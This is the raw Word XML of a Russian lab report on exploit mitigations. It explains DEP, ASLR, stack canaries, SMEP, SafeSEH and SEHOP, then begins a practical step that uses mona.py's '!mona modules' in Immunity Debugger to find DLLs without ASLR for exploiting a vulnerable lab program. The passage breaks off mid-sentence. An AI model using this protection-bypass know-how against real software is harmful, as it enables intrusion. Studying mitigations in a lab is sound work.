          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>базонезависимого</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A24C5" w14:textId="7B417BD1" w:rsidR="000D7F1F" w:rsidRDefault="000D7F1F" w:rsidP="00943A11">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE465A8" w14:textId="3ADA35E6" w:rsidR="006E3D3D" w:rsidRPr="006426CC" w:rsidRDefault="00437BF0" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2BE916" w14:textId="3297703E" w:rsidR="003042FE" w:rsidRPr="00437BF0" w:rsidRDefault="00762CD6" w:rsidP="00A72CAE">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Изучение защитных механизмов, затрудняющих эксплуатацию уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5270C151" w14:textId="77777777" w:rsidR="00A72CAE" w:rsidRPr="00437BF0" w:rsidRDefault="00A72CAE" w:rsidP="00A72CAE"/>
    <w:p w14:paraId="70D966E6" w14:textId="3A23FE71" w:rsidR="000848C7" w:rsidRDefault="00796857" w:rsidP="005C04AC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437BF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data Execution Prevention (DEP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D47B2C7" w14:textId="32818030" w:rsidR="003042FE" w:rsidRPr="000979F6" w:rsidRDefault="003042FE" w:rsidP="003042FE">
      <w:r w:rsidRPr="003042FE">
        <w:t>DEP работает на уровне процессора (используя бит NX – No-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003042FE">
        <w:t>eXecute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003042FE">
        <w:t>) и операционной системы. Он помечает определенные области памяти (например, стек и кучу), как предназначенные исключительно для хранения данных, запрещая выполнение машинного кода из этих областей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7448BC24" w14:textId="029D1504" w:rsidR="003042FE" w:rsidRPr="00CC17D4" w:rsidRDefault="00CC17D4" w:rsidP="003042FE">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17D4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>предотвращает к</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC17D4">
        <w:t xml:space="preserve">лассические атаки переполнения буфера, при которых атакующий записывает свой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC17D4">
        <w:t>шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC17D4">
        <w:t xml:space="preserve"> прямо на стек и передает на него управление. Если DEP включен, процессор выдаст исключение (Access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC17D4">
        <w:t>Violation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC17D4">
        <w:t>) при попытке выполнить инструкции на стеке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8738B2" w14:textId="77777777" w:rsidR="003042FE" w:rsidRPr="00CC17D4" w:rsidRDefault="003042FE" w:rsidP="003042FE"/>
    <w:p w14:paraId="65942B1D" w14:textId="22181D28" w:rsidR="003042FE" w:rsidRDefault="00076D3F" w:rsidP="00DB37D5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000979F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E232B4" w:rsidRPr="00E232B4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Address Space Layout Randomization (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidR="00E232B4" w:rsidRPr="00E232B4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4697D977" w14:textId="30A60420" w:rsidR="009B54DC" w:rsidRPr="009B54DC" w:rsidRDefault="009B54DC" w:rsidP="009B54DC">
      <w:r w:rsidRPr="009B54DC">
        <w:t>При каждой загрузке системы или запуске процесса ASLR случайным образом изменяет базовые адреса загрузки исполняемого файла, динамических библиотек, а также адреса стека и кучи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CAB9B6" w14:textId="55F6742B" w:rsidR="00076D3F" w:rsidRDefault="009B54DC" w:rsidP="00076D3F">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidRPr="009B54DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>предотвращает и</w:t>
      </w:r>
      <w:r w:rsidR="00631BB3" w:rsidRPr="00631BB3">
        <w:t>спользование жестко закодированных адресов в эксплойтах. Атакующий не может заранее знать, по какому адресу будет находиться нужная ему функция</w:t>
      </w:r>
      <w:r w:rsidR="001D776A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B53DFF4" w14:textId="77777777" w:rsidR="001D776A" w:rsidRDefault="001D776A" w:rsidP="00076D3F"/>
    <w:p w14:paraId="450C452E" w14:textId="069727EB" w:rsidR="001D776A" w:rsidRPr="00D609FB" w:rsidRDefault="00D609FB" w:rsidP="00D609FB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000979F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D609FB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GS / Security Cookies (</w:t>
      </w:r>
      <w:r>
        <w:t>Стековые</w:t>
      </w:r>
      <w:r w:rsidRPr="00D609FB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>канарейки</w:t>
      </w:r>
      <w:r w:rsidRPr="00D609FB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF706B4" w14:textId="6965AF3E" w:rsidR="003042FE" w:rsidRPr="002A0287" w:rsidRDefault="002A0287" w:rsidP="003042FE">
      <w:r w:rsidRPr="002A0287">
        <w:t>Это защита, добавляемая компилятором. При вызове функции компилятор помещает специальное случайное значение (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A0287">
        <w:t>cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A0287">
        <w:t>/канарейку) на стек между локальными переменными и сохраненным адресом возврата (EIP). Перед выходом из функции программа проверяет, не изменилось ли это значение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4ED1F" w14:textId="054B4ED9" w:rsidR="003042FE" w:rsidRDefault="002A0287" w:rsidP="003042FE">
      <w:r>
        <w:t>Стековые канарейки предотвращают п</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0287">
        <w:t xml:space="preserve">рямое перезаписывание адреса возврата. При переполнении буфера атакующий неизбежно затрет эту </w:t>
      </w:r>
      <w:r w:rsidRPr="002A0287">
        <w:lastRenderedPageBreak/>
        <w:t>канарейку. Проверка перед инструкцией RET выявит повреждение, и процесс будет принудительно завершен до того, как управление перейдет к коду злоумышленника.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0878F5" w14:textId="77777777" w:rsidR="002468C4" w:rsidRDefault="002468C4" w:rsidP="003042FE"/>
    <w:p w14:paraId="25E7E337" w14:textId="0040184B" w:rsidR="00D712AF" w:rsidRDefault="002468C4" w:rsidP="002468C4">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000979F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002468C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Supervisor Mode Execution Prevention (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMEP</w:t>
      </w:r>
      <w:r w:rsidRPr="002468C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC7DB6A" w14:textId="4978A892" w:rsidR="002468C4" w:rsidRPr="000979F6" w:rsidRDefault="009A0FAC" w:rsidP="002468C4">
      <w:r w:rsidRPr="009A0FAC">
        <w:t>Аппаратная функция современных процессоров. Она запрещает ядру операционной системы (которое работает в привилегированном режиме – Ring 0) выполнять код, расположенный в страницах памяти пользовательского режима (Ring 3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E146C6" w14:textId="52C794D2" w:rsidR="009A0FAC" w:rsidRDefault="006E6B1F" w:rsidP="002468C4">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMEP</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6B1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>предотвращает а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6B1F">
        <w:t>таки на повышение привилегий (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E6B1F">
        <w:t>Privilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E6B1F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E6B1F">
        <w:t>Escalation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E6B1F">
        <w:t xml:space="preserve">). До SMEP злоумышленники могли эксплуатировать уязвимость в драйвере ядра, заставляя его прыгнуть на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E6B1F">
        <w:t>шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E6B1F">
        <w:t>, заранее подготовленный в обычной пользовательской памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663D8F4A" w14:textId="77777777" w:rsidR="00F26B8F" w:rsidRDefault="00F26B8F" w:rsidP="002468C4"/>
    <w:p w14:paraId="6F67E811" w14:textId="1498AE11" w:rsidR="00F26B8F" w:rsidRPr="00F26B8F" w:rsidRDefault="007201A0" w:rsidP="00F26B8F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000979F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F26B8F" w:rsidRPr="00F26B8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Safe Structured Exception Handling (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F26B8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SaveSEH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F26B8F" w:rsidRPr="00F26B8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338D4E0" w14:textId="66E681C9" w:rsidR="00F26B8F" w:rsidRDefault="00125122" w:rsidP="00F26B8F">
      <w:r w:rsidRPr="00125122">
        <w:t>Защита механизма структурной обработки исключений (SEH). При компиляции с флагом /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00125122">
        <w:t>SafeSEH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00125122">
        <w:t xml:space="preserve"> создается специальная таблица разрешенных обработчиков исключений. Когда происходит ошибка и система собирается вызвать обработчик, она сначала проверяет, есть ли его адрес в этом списке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A730E" w14:textId="5A3822C4" w:rsidR="00125122" w:rsidRDefault="007201A0" w:rsidP="00F26B8F">
      <w:r>
        <w:t>Данная защита предотвращает э</w:t>
      </w:r>
      <w:r w:rsidRPr="007201A0">
        <w:t xml:space="preserve">ксплуатацию через перезапись SEH-кадров на стеке. Атакующий больше не может подменить адрес обработчика исключений на адрес своего </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007201A0">
        <w:t>шеллкода</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007201A0">
        <w:t xml:space="preserve">, так как этот адрес не пройдет проверку в таблице </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007201A0">
        <w:t>SafeSEH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007201A0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243198C4" w14:textId="77777777" w:rsidR="002602E0" w:rsidRDefault="002602E0" w:rsidP="00F26B8F"/>
    <w:p w14:paraId="2C81FA06" w14:textId="52CB35AC" w:rsidR="002602E0" w:rsidRDefault="00B24F0D" w:rsidP="002602E0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000979F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B24F0D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Structured Exception Handling Overwrite Protection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SEHOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B24F0D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A8DDA9" w14:textId="49D34172" w:rsidR="00B24F0D" w:rsidRPr="000979F6" w:rsidRDefault="0013684F" w:rsidP="00B24F0D">
      <w:r w:rsidRPr="0013684F">
        <w:t xml:space="preserve">SEHOP проверяет целостность всей цепочки обработчиков исключений (связного списка) непосредственно перед тем, как передать управление обработчику. Он убеждается, что цепочка не разорвана и заканчивается легитимным системным обработчиком (обычно </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013684F">
        <w:t>ntdll!FinalExceptionHandler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013684F">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1733655A" w14:textId="6BC65639" w:rsidR="00030155" w:rsidRPr="000979F6" w:rsidRDefault="00AD2D92" w:rsidP="005B4704">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SEHOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D92">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>предотвращает а</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2D92">
        <w:t>таки SEH-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD2D92">
        <w:t>Overwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD2D92">
        <w:t xml:space="preserve"> даже в тех программах, которые были скомпилированы без поддержки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AD2D92">
        <w:t>SafeSEH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AD2D92">
        <w:t>. Если злоумышленник перезапишет один узел цепочки, нарушится связь до финального обработчика, и SEHOP заблокирует эксплойт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F9D7D9" w14:textId="77777777" w:rsidR="00F42C40" w:rsidRPr="00030155" w:rsidRDefault="00F42C40" w:rsidP="003042FE"/>
    <w:p w14:paraId="3CBEB081" w14:textId="77777777" w:rsidR="00F42C40" w:rsidRPr="00030155" w:rsidRDefault="00F42C40" w:rsidP="003042FE"/>
    <w:p w14:paraId="0415CAEE" w14:textId="77777777" w:rsidR="00F42C40" w:rsidRPr="00030155" w:rsidRDefault="00F42C40" w:rsidP="003042FE"/>
    <w:p w14:paraId="37F5248F" w14:textId="7A860FB7" w:rsidR="000848C7" w:rsidRPr="00F42C40" w:rsidRDefault="000848C7" w:rsidP="003042FE">
      <w:r w:rsidRPr="00F42C40">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51422811" w14:textId="1B030995" w:rsidR="000848C7" w:rsidRPr="0013684F" w:rsidRDefault="00437BF0" w:rsidP="00437BF0">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76869A25" w14:textId="73A4D389" w:rsidR="007D6A24" w:rsidRPr="007D6A24" w:rsidRDefault="007D6A24" w:rsidP="006426CC">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="007D6A24">
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00943A11" w:rsidRPr="00943A11">
        <w:t>олучение списка загруженных в процесс модулей, не использующих технологию рандомизации адресов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32106047" w14:textId="5B36B562" w:rsidR="004076C4" w:rsidRPr="000979F6" w:rsidRDefault="007D6A24" w:rsidP="004076C4">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="007D6A24">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D621B2">
        <w:t>Для начала</w:t>
      </w:r>
      <w:r w:rsidR="004076C4">
        <w:t xml:space="preserve"> произведем</w:t>
      </w:r>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t xml:space="preserve"> анализ полу</w:t>
      </w:r>
      <w:r w:rsidR="004076C4">
        <w:t xml:space="preserve">ченного </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004076C4">
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004076C4">
        <w:t>-файла с уязвимостью, найденной в</w:t>
      </w:r>
      <w:r w:rsidR="00D621B2">
        <w:t xml:space="preserve"> первой</w:t>
      </w:r>
      <w:r w:rsidR="004076C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t>лабораторной</w:t>
      </w:r>
      <w:r w:rsidR="00D621B2">
        <w:t xml:space="preserve"> работе</w:t>
      </w:r>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t>. Для эксплуатации</w:t>
      </w:r>
      <w:r w:rsidR="004076C4">
        <w:t xml:space="preserve"> проверим используемые </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004076C4">
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004076C4">
        <w:t>-файлы</w:t>
      </w:r>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t xml:space="preserve"> на использование встроенных механизмов за</w:t>
      </w:r>
      <w:r w:rsidR="004076C4">
        <w:t xml:space="preserve">щиты (DEP, ASLR). Для этого используем </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t xml:space="preserve">-скрипт </w:t>
      </w:r>
      <w:r w:rsidR="004076C4" w:rsidRPr="004076C4">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t>mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004076C4">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004076C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004076C4" w:rsidRPr="004076C4">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t xml:space="preserve"> для программы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t>Immunity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t>Debugger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004076C4" w:rsidRPr="004437AA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A601B" w14:textId="06E55982" w:rsidR="004076C4" w:rsidRDefault="004076C4" w:rsidP="00194F47">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="004437AA">
        <w:t>Сначала, при по</w:t>
      </w:r>
      <w:r w:rsidR="00194F47">
        <w:t>мощи команды</w:t>
      </w:r>
      <w:r w:rsidR="00012568">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00194F47" w:rsidRPr="00012568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00194F47" w:rsidRPr="00012568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00194F47" w:rsidRPr="00012568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00194F47" w:rsidRPr="00012568">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00194F47">
        <w:t xml:space="preserve"> получим</w:t>
      </w:r>
      <w:r w:rsidRPr="004437AA">
        <w:t xml:space="preserve"> список всех подгруженных ис</w:t>
      </w:r>
      <w:r w:rsidR="00194F47">
        <w:t>полняемым файлом DLL-</w:t>
      </w:r>
      <w:r>
        <w:t>библиотек</w:t>
      </w:r>
      <w:r w:rsidR="000434E2" w:rsidRPr="000434E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000434E2">
        <w:t>в отдельном файле</w:t>
      </w:r>
      <w:r w:rsidRPr="004076C4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5405CFDC" w14:textId="77777777" w:rsidR="00440777" w:rsidRDefault="00E0191C" w:rsidP="00440777">
      <w:pPr>
        <w:pStyle w:val="afc"/>
      </w:pPr>
      <w:r w:rsidRPr="00E0191C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25BE9CD2" wp14:editId="27BE1347">
            <wp:extent cx="5940425" cy="1607055"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="214016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67279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C690" w14:textId="3219F580" w:rsidR="007D6A24" w:rsidRPr="00C92B9E" w:rsidRDefault="00440777" w:rsidP="00C92B9E">
      <w:pPr>
        <w:pStyle w:val="affa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Ref225703358"/>
      <w:r w:rsidRPr="00440777">
        <w:rPr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440777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440777">
        <w:rPr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440777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9627BF">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00440777">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00440777">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Список всех подгруженных DLL библиотек</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380734B2" w14:textId="5A987300" w:rsidR="00194F47" w:rsidRPr="00F440D7" w:rsidRDefault="00E700AD" w:rsidP="00194F47">
      <w:pPr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Из</w:t>
      </w:r>
      <w:r w:rsidR="006F36D4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F36D4" w:rsidRPr="006F36D4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006F36D4" w:rsidRPr="006F36D4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref225703358 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="006F36D4" w:rsidRPr="006F36D4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="006F36D4" w:rsidRPr="006F36D4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006F36D4" w:rsidRPr="006F36D4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Рисун</w:t>
      </w:r>
      <w:r w:rsidR="006F36D4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ке</w:t>
      </w:r>
      <w:r w:rsidR="006F36D4" w:rsidRPr="006F36D4">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F36D4" w:rsidRPr="006F36D4">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="006F36D4" w:rsidRPr="006F36D4"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 видно, что </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00194F47" w:rsidRPr="009C4665">
        <w:rPr>
